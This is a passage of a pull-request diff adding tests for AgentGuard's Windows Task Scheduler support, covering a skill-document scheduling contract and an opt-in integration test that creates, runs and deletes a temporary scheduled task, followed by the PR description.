+      { platform: 'win32', runCommand: runner, gateway },
+    );
+
+    assert.equal(results.some((item) => item.backend === 'windows-task-scheduler'), true);
+    assert.equal(results.some((item) => item.backend === 'system'), false);
+    assert.equal(commands.includes('crontab'), false);
   });
 
   it('removes the managed system crontab block without touching other entries', async () => {

--- a/src/tests/patrol-skill.test.ts
+++ b/src/tests/patrol-skill.test.ts
@@ -1,0 +1,26 @@
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { resolve } from 'node:path';
+
+const skillPath = resolve(__dirname, '..', '..', 'skills', 'agentguard', 'SKILL.md');
+
+describe('AgentGuard patrol skill scheduling contract', () => {
+  it('uses the existing eight-check collector for Windows and Unix schedules', () => {
+    const skill = readFileSync(skillPath, 'utf8');
+    const scheduledSection = skill.slice(skill.indexOf('#### Path B'), skill.indexOf('### patrol status'));
+
+    assert.match(scheduledSection, /call "<AGENTGUARD_CLI>" checkup --json/);
+    assert.match(scheduledSection, /'<NODE_EXE>' '<AGENTGUARD_CLI>' checkup --json/);
+    assert.doesNotMatch(scheduledSection, /AGENTGUARD_AUTO_SCAN|scripts[\\/]auto-scan\.js/);
+  });
+
+  it('recognizes only completed eight-check events as patrol status', () => {
+    const skill = readFileSync(skillPath, 'utf8');
+    const statusSection = skill.slice(skill.indexOf('### patrol status'), skill.indexOf('\n---', skill.indexOf('### patrol status')));
+
+    assert.match(statusSection, /event: "checkup"/);
+    assert.match(statusSection, /`checks` value is `8`/);
+    assert.match(statusSection, /Never report `event: "auto_scan"` as a completed patrol/);
+  });
+});

--- a/src/tests/windows-scheduler.integration.test.ts
+++ b/src/tests/windows-scheduler.integration.test.ts
@@ -1,0 +1,100 @@
+import { randomUUID } from 'node:crypto';
+import { existsSync, mkdtempSync, readFileSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { join } from 'node:path';
+import { pathToFileURL } from 'node:url';
+import { it } from 'node:test';
+import assert from 'node:assert/strict';
+import {
+  execCommand,
+  inspectWindowsThreatFeedTask,
+  installThreatFeedCron,
+  removeThreatFeedCron,
+} from '../feed/cron.js';
+
+const WINDOWS_INTEGRATION_ENABLED =
+  process.platform === 'win32' && process.env.AGENTGUARD_WINDOWS_SCHEDULER_INTEGRATION === '1';
+
+async function waitForFile(path: string, timeoutMs = 15_000): Promise<void> {
+  const deadline = Date.now() + timeoutMs;
+  while (!existsSync(path)) {
+    if (Date.now() >= deadline) throw new Error(`Timed out waiting for ${path}`);
+    await new Promise(resolve => setTimeout(resolve, 100));
+  }
+}
+
+function processIsAlive(pid: number): boolean {
+  try {
+    process.kill(pid, 0);
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+it('creates, queries, runs, ends, and deletes a real current-user Windows scheduled task', {
+  skip: WINDOWS_INTEGRATION_ENABLED
+    ? false
+    : 'set AGENTGUARD_WINDOWS_SCHEDULER_INTEGRATION=1 on Windows to run',
+}, async () => {
+  const name = `agentguard-test-${randomUUID()}`;
+  const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-integration-'));
+  const helperPath = join(home, 'long-running-runner.mjs');
+  const processMarkerPath = join(home, 'runner-processes.json');
+  const cronModuleUrl = pathToFileURL(join(process.cwd(), 'dist', 'feed', 'cron.js')).href;
+  writeFileSync(helperPath, [
+    "import { spawn } from 'node:child_process';",
+    "import { writeFileSync } from 'node:fs';",
+    `import { runWindowsCronTick } from ${JSON.stringify(cronModuleUrl)};`,
+    `const markerPath = ${JSON.stringify(processMarkerPath)};`,
+    "if (process.argv[2] === 'windows-cron-run') {",
+    "  const index = process.argv.indexOf('--config');",
+    "  await runWindowsCronTick(process.argv[index + 1]);",
+    "} else if (process.argv[2] === 'subscribe') {",
+    "  const grandchild = spawn(process.execPath, ['-e', 'setInterval(() => {}, 1000)'], { stdio: 'ignore' });",
+    "  writeFileSync(markerPath, JSON.stringify({ childPid: process.pid, grandchildPid: grandchild.pid }));",
+    "  setInterval(() => {}, 1000);",
+    "}",
+    '',
+  ].join('\n'));
+  let spawnedPids: number[] = [];
+  try {
+    const installed = await installThreatFeedCron({
+      name,
+      cronExpression: '* * * * *',
+      quiet: true,
+      force: false,
+      backend: 'windows',
+      agentHost: 'codex',
+      agentGuardHome: home,
+      timezone: 'UTC',
+    }, {
+      nodeExecutable: process.execPath,
+      cliEntrypoint: helperPath,
+    });
+    assert.equal(installed.backend, 'windows-task-scheduler');
+    assert.equal(installed.created, true);
+
+    const status = await inspectWindowsThreatFeedTask({ name, agentGuardHome: home });
+    assert.equal(status.installed, true);
+    assert.equal(status.cronExpression, '* * * * *');
+
+    await execCommand('schtasks.exe', ['/Run', '/TN', `AgentGuard-${name}`]);
+    await waitForFile(processMarkerPath);
+    const marker = JSON.parse(readFileSync(processMarkerPath, 'utf8')) as {
+      childPid: number;
+      grandchildPid: number;
+    };
+    spawnedPids = [marker.childPid, marker.grandchildPid];
+    assert.equal(spawnedPids.every(processIsAlive), true);
+  } finally {
+    const removal = await removeThreatFeedCron({
+      name,
+      backend: 'windows',
+      agentGuardHome: home,
+    });
+    assert.equal(removal[0]?.error, undefined);
+  }
+  assert.equal(spawnedPids.length, 2);
+  assert.equal(spawnedPids.some(processIsAlive), false);
+});


### PR DESCRIPTION
## Summary

Add native Windows Task Scheduler support for AgentGuard scheduled jobs.

- Support scheduled threat-feed polling and security patrols on Windows.
- Run tasks as the current user with least privilege.
- Add safe task inspection, replacement, cleanup, and process ownership checks.
- Integrate Windows scheduling with the CLI and DSH subscription workflow.
- Update documentation and add unit and Windows integration coverage.

## Type

- [ ] Bug fix
- [x] New feature / detection rule
- [ ] Refactoring
- [ ] Documentation

## Testing

- [x] `npm run build` passes
- [x] `npm test` passes (660 tests: 659 passed, 1 skipped)
- [ ] Manually tested the change

## Related Issues

Closes #   